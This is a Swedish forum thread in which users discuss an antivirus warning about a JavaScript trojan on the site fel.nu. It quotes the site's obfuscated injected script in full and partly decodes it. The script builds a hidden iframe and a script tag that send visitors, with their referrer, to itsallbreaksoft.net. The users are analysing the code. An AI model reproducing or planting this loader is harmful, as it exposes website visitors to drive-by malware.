Jag fick just ett meddelande om att en trojan tagits bort från min dator. Den heter "Trojan.JS.Iframe.AED" och källan (hemsidan) är www.fel.nu

Någon mer som fått den?

geocache

Jag har ingen lust att utmana ödet och testa, men har du provat med flera antivirusprogram? Ibland får man falsklarm. Programmen är ofta gjorda att hellre varna i onödan än missa ett faktiskt virus.

Hej Kvasir !

Jag har PC Protection Plus och det var det programmet som "varnade" och som automatiskt tog bort den där trojanen.

Och det kan mycket väl ha varit en riktig trojan också. Vad jag menar är att det ibland blir falska larm, där antivirusprogrammen varnar för något som ser suspekt ut men inte är något virus. Men så länge det inte ställer till något problem för en så gör det ju inte så mycket.

Nä något virus verkar det inte vara i min dator. Men jag funderar en del på hur det kan komma sig att den är så långsam. Det kan ta upp till femton, tjugo sekunder innan fönstret till en hemsida jag gått in på öppnas.

Jag pratade vid ett tillfälle för längesedan med en kille som leder datakurser på ett studieförbund, och han berättade för mig att sådant kan bero på att det är många ute på nätet samtidigt, att det är det som gör att det tar så lång tid att få upp en "ny" hemsida". Men det kanske (mera) beror på att servern är väldigt belastad?

Kör Epiphany i Ubuntu, så jag är inte rädd för trojaner.

Nu var det många år sedan jag sysslade med webbsidor, men jag kollade igenom källkoden på fel.nu och hittade en sak jag tyckte var konstig:

Kod: Markera allt

<script>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%
61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%
72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%
6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%
3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%
72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%
2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%
75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%
73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%264Fepdvnfou/xsjuf%2639%2633%264Dtdsjqu%2631tsd%264E%266D%2633%
2633%2C%2633iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G3%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%
2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%
2635lfzxpse%
2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%
263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2633%2C%2633%266D%2633%264F%264D%266D0tdsjqu%264F%2633%263%3A%264C%264D0tdsjqu%264F%261B%264Dtdsjqu%264F%261Bjg%2639uzqfpg%2639i%263%3A%264E%264E%2633voefgjofe%
2633%263%3A%268C%261%3A%261B%261%3Aepdvnfou/xsjuf%2639%2633%264Djgsbnf%2631tsd%264E%2638iuuq%264B00jutbmmcsfbltpgu
/ofu0uet0jo/dhj%264G4%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%
2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2638%2631xjeui%264E2%2631ifjhiu%264E2%2631cpsefs%264E1%
2631gsbnfcpsefs%264E1%264F%264D0jgsbnf%264F%2633%263%3A%264C%2631%261B%268E%261Bfmtf%2631jg%2639i/joefyPg%2639%2633iuuq%264B%2633%263%3A%264E%264E1%263%3A%268C%261B%261%3A%261%3Axjoepx/mpdbujpo%264Ei%264C%261B%268E%261B%264D0tdsjqu%264F1')</script>


Någon som vet hur man enkelt avkodar detta dolda budskap?

Sätt dig med ASCII-tabellen... jag orkar inte

Den första strängen var lätt att avkoda:

Kod: Markera allt

script language="javascript">function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}</script>

men den andra är lite jobbigare, men det ser ut som att kodaren har blandat unicode med vanliga tecken. Den andra strängen processas i funktionen dF, som antagligen spottar ut den slutgiltiga läsbara(?) eller körbara strängen.

Varför är mitt inlägg anmält?

Sidan är åtskilliga gånger bredare än normalt. Jag anmälde tveskäggs kodsträng som säkert och din som eventuellt lämplig att typ stava av.

Tecknen i den andra strängen behöver bara skiftas ett steg tillbaka i asciitabellen för att få de riktiga tecknen ser jag nu (efter att ha synat funktionen dF).

Zombie skrev:Sidan är åtskilliga gånger bredare än normalt. Jag anmälde tveskäggs kodsträng som säkert och din som eventuellt lämplig att typ stava av.

Jaha, hos mig var det avstavat redan från början, men det är tydligen olika i olika vävläsare!?

Edit:
Japp; i Opera avstavas det, men inte i Firefox.

Aj fan, så låg det till ja. Avstavningen hos mig:
Safari - ingen
Firefox - otillräcklig (= sidan fortfarande bredare än normalt)
Opera - tillräcklig

Jag hittade adressen "itsallbreaksoft.net" i andra strängen och googlade fram denna beskrivning:
http://www.theinternetpatrol.com/was-yo ... -happened/

Så ja, det verkar vara lite elak kod i farten.